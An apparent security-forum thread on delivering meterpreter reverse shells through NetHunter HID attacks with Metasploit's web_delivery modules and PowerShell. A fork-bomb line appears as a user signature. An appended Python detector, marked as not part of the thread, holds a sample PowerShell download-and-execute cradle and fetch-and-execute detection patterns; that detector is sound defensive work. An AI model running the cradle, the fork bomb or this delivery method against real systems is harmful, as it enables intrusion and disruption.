Thread: HID attacks using metasploit's psh_web_delivery instead of Powersploit

  1. #1
    Join Date
    2014-Nov
    Posts
    9

    HID attacks using metasploit's psh_web_delivery instead of Powersploit

    PowerSploit is an excellent tool, but I have found it to be less than reliable when dealing with 64-bit systems (at least with NetHunter and the HID attack). When using the PowerSploit payload for the HID attack, you are required either to have Apache running on your NetHunter device, and hope the target network does not have client separation to prevent the victim from pulling PowerShell code off your NetHunter device, or to push your own PowerSploit payload to a server for it to be pulled down from. The problem with this is that you can potentially have to spin up two servers to serve up the payload and then receive a connect-back shell. A more efficient and flexible option is to use PowerShell to pull down shellcode from Metasploit's exploit/windows/misc/psh_web_delivery and then pass the URL it serves up to NetHunter to download and run via IEX as you would any PowerShell payload. The main advantage of this is that all outbound traffic goes to only one server (the server that would receive the connect back, which would be serving up the payload via a different MSF module), and you can potentially serve payloads other than meterpreter (any PowerShell code really).

  2. #2
    Join Date
    2014-Sep
    Posts
    176
    I find this idea very interesting. I would love to give a test out when I get some time.

  3. #3
    Join Date
    2014-Nov
    Posts
    9
    I can confirm that this vector does work on Windows 8.1 using exploit/multi/script/web_delivery and meterpreter/reverse_https as the payload, and it seems to provide a more stable meterpreter connection than the PowerSploit vector. If anyone wants, I can post a tutorial on how to use this vector in the How To section.

  4. #4
    Join Date
    2014-Nov
    Location
    Sweden
    Posts
    21
    @thesle3p that would be great! Thank you!
    ){ :|:& };:

  5. #5
    Hi everyone, are there any updates? I tried to apply this method, but there is no payload option for Windows when using exploits/multi/script/web_delivery.

    Is anyone else having the same issue?

  6. #6
    Okay, I am stupid. I just noticed that I need to first set the target to 2, which is for PSH. Now I can use Windows payloads.

  7. #7
    Join Date
    2014-Nov
    Posts
    9
    Yeah, further testing revealed it works extremely well with exploits/multi/script/web_delivery with whatever Windows payload you throw at it. Sorry it took so long to return to this.

  8. What a great idea, it will help me a lot. Thank you very much.
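
A defender-side view of the delivery method described in the first post, added here as an example that is not part of the thread: it scans process-creation records for PowerShell command lines that both fetch content over HTTP and run it through IEX, and extracts the server so it can be matched against outbound connection logs (the post notes that payload and callback share one server). The event layout, host names, URLs and the helper name `find_cradles` are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records (Sysmon Event ID 1 style fields).
# None of these values come from the thread.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS01", "image": PS,
     "cmdline": "powershell.exe -c \"IEX ((New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10:8080/AbCd'))\""},
    {"host": "WS02", "image": PS,
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    # Download to disk without in-memory execution: a different pattern.
    {"host": "WS03", "image": PS,
     "cmdline": "powershell.exe -c \"Invoke-WebRequest "
                "https://example.com/tool.zip -OutFile C:\\Temp\\tool.zip\""},
    # Same keywords, but the process is not PowerShell.
    {"host": "WS04", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo iex downloadstring http://192.0.2.10/"},
]

FETCH = re.compile(r"downloadstring|downloaddata|invoke-webrequest|"
                   r"invoke-restmethod|\biwr\b|\birm\b", re.I)
EXEC = re.compile(r"\biex\b|invoke-expression", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def is_powershell(image):
    """True when the image path ends in a PowerShell host binary."""
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}

def find_cradles(events):
    """Return one finding per PowerShell process that fetches and executes."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        if not is_powershell(ev["image"]):
            continue
        if not (FETCH.search(cmd) and EXEC.search(cmd)):
            continue
        m = URL.search(cmd)
        # The URL may be built from variables; report None in that case.
        server = urlparse(m.group(0)).netloc if m else None
        findings.append({"host": ev["host"], "server": server})
    return findings

if __name__ == "__main__":
    for f in find_cradles(SAMPLE_EVENTS):
        print(f"{f['host']}: fetch-and-execute from {f['server']}")
```

The `server` value from each finding is the pivot: search proxy or firewall logs for later connections from the same host to that address.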
